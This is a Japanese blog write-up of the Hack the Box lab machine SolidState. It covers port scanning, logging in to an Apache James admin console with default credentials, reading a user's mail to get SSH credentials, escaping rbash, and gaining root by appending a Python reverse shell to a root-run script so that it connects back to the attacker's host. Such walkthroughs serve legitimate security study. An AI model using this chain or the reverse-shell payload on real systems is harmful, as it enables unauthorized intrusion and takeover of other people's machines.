【Hack the Box write-up】SolidState

July 12, 2020

はじめに

筆者は Hack the Box 初心者です。 何か訂正や補足、アドバイスなどありましたら、コメントか Twitter までお願いします。 さんぽし(@sanpo_shiho) | Twitter

cheat sheet

以下で cheat sheet としてツールの使い方などをまとめています。参考にしてください。 github | sanposhiho/MYCHEATSHEET

machine について

難易度は medium です スクリーンショット 2020-07-12 3.25.23.png

nmap

kali@kali:~/results/10.10.10.51$ nmap -Pn -sV -sC 10.10.10.51
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-10 07:04 EDT
Nmap scan report for 10.10.10.51
Host is up (0.26s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp  open  smtp    JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.48 [10.10.14.48]),
80/tcp  open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp open  pop3    JAMES pop3d 2.3.2
119/tcp open  nntp    JAMES nntpd (posting ok)
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 76.44 seconds
kali@kali:~$ nmap -p- --min-rate 10000  10.10.10.51
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-11 12:07 EDT
Warning: 10.10.10.51 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.51
Host is up (0.25s latency).
Not shown: 58983 closed ports, 6546 filtered ports
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
110/tcp  open  pop3
119/tcp  open  nntp
4555/tcp open  rsip

Nmap done: 1 IP address (1 host up) scanned in 56.05 seconds

kali@kali:~$ nmap -sC -sV -p22,25,80,110,119,4555 10.10.10.51
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-11 12:11 EDT
Nmap scan report for 10.10.10.51
Host is up (0.25s latency).

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp   open  smtp        JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.48 [10.10.14.48]),
80/tcp   open  http        Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp  open  pop3        JAMES pop3d 2.3.2
119/tcp  open  nntp        JAMES nntpd (posting ok)
4555/tcp open  james-admin JAMES Remote Admin 2.3.2
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.42 seconds

searchsploit

kali@kali:~$ searchsploit james
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                                                    |  Path
                                                                                                                                                                                                  | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Apache James Server 2.2 - SMTP Denial of Service                                                                                                                                                  | exploits/multiple/dos/27915.pl
Apache James Server 2.3.2 - Remote Command Execution                                                                                                                                              | exploits/linux/remote/35513.py
WheresJames Webcam Publisher Beta 2.0.0014 - Remote Buffer Overflow                                                                                                                               | exploits/windows/remote/944.c
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- -----------------------------------------------
 Paper Title                                                                                                                                                                               |  Path
                                                                                                                                                                                           | (/usr/share/exploitdb-papers/)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- -----------------------------------------------
Exploiting Apache James Server 2.3.2                                                                                                                                                       | docs/english/40123-exploiting-apache-james-ser
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- -----------------------------------------------

exploits/linux/remote/35513.pyが使えそうですが使えませんでした

james

nc で接続できることに気がつきます default の root/root でログインできます

kali@kali:~$ nc 10.10.10.51 4555
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
HELP
Currently implemented commands:
help                                    display this help
listusers                               display existing accounts
countusers                              display the number of existing accounts
adduser [username] [password]           add a new user
verify [username]                       verify if specified user exist
deluser [username]                      delete existing user
setpassword [username] [password]       sets a user's password
setalias [user] [alias]                 locally forwards all email for 'user' to 'alias'
showalias [username]                    shows a user's current email alias
unsetalias [user]                       unsets an alias for 'user'
setforwarding [username] [emailaddress] forwards a user's email to another email address
showforwarding [username]               shows a user's current email forwarding
unsetforwarding [username]              removes a forward
user [repositoryname]                   change to another user repository
shutdown                                kills the current JVM (convenient when James is run as a daemon)
quit                                    close connection
listusers
Existing accounts 7
user: james
user: ../../../../../../../../etc/bash_completion.d
user: thomas
user: john
user: mindy
user: mailadmin
user: test
setpassword mindy pass
Password for mindy reset
quit
Bye

user を listusers で列挙し、mindy のパスワードを試しに変更して telnet で login します

telnet

kali@kali:~$ telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER mindy
+OK
PASS pass
+OK Welcome mindy
LIST
+OK 2 1945
1 1109
2 836
.
RETR 1109
-ERR Message (1109) does not exist.
RETR 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: mailadmin@localhost
Subject: Welcome

Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.

We are looking forward to you joining our team and your success at Solid State Security.

Respectfully,
James
.
RETR 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,


Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.

username: mindy
pass: P@55W0rd1!2@

Respectfully,
James

.
^]
telnet> z

[4]+  Stopped                 telnet 10.10.10.51 110

お、いい感じに password がでて来ました ※他の Writeup をみた感じだと本当にはじめに James を引いたのラッキーだった、ありがとう James!

ssh

ssh ログインします

kali@kali:~$ ssh [email protected]
[email protected]'s password:
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142
mindy@solidstate:~$ whoami
-rbash: whoami: command not found

rbash かよ…

rbash を抜けたい

ssh [email protected] -t bashで抜けられました

ssh user@host [command]でコマンド実行、-tで強制的に tty を割り当てる と言った仕組みです

kali@kali:~$ ssh [email protected] -t bash
[email protected]'s password:
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ whoami
mindy

PE

pspy でみると /opt/tmp.py が root が定期実行しているので、以下のコマンドに置き換えます(以下のコマンドはPayloadsAllTheThings)より

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.48",1212));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.48",1212));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' >> /opt/tmp.py

これで kali で nc で待ち構えていると root のリバースシェルが取れます

kali@kali:~$ nc -lnvp 1212
listening on [any] 1212 ...
connect to [10.10.14.48] from (UNKNOWN) [10.10.10.51] 36992
root@solidstate:~# ls
ls
root.txt

終わりに

割とベーシックでしたね〜〜〜(最近この終わりにのコメントが思いつかない

このエントリーをはてなブックマークに追加